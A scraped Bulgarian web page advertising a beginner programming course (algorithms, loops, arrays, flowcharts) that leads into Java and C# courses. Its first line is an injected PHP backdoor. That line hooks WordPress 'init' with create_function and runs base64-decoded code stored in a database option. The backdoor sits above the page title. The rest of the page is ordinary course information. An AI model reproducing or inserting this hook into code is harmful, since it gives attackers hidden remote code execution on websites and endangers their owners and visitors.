add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Computer Programming - Basics - НАРС

Основи на програмирането

Какво включва?

Придобиват се начални и базови познания за алгоритми, цикли и масиви. Работи се с “блок-схеми” и се набляга на изграждането на т.нар. логическо мислене, необходимо за успешно развитие в областта на разработката на софтуерни приложения.

Най-общо курсът дава всички необходими начални познания за успешното преминаване на курсовете от следващото ниво – „Въведение в програмирането с Java” и „Въведение в програмирането със С#”.

За кого е предназначен?
Курсът е предназначен за хора без опит в програмирането.

Какво получава всеки курсист?
Всички курсисти, преминали обучението „Основи на програмирането”, получават документ за участието си.

Заедно с това всеки участник получава отстъпка при записване за предстоящите нива на обучението:
Introduction to programming in Java/ Въведение в програмирането с Java
Introduction to programming in C#/ Въведение в програмирането със С#

След успешно преминаване на последващи нива от обученията по Java или .NET в НАРС, което се удостоверява, чрез полагането на специализиран изпит, курсистите могат да получат и “Удостоверение за професионално обучение” по образец на Министерството на образованието и науката.

Изпитите се провеждат по желание на студентите в съответния курс, поради което не са включени в програмата на обучението.

Вижте цените и допълнителна информация за курса.

Изтеглете брошура с информация за всички курсове.

За повече информация може да се свържете с нас.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad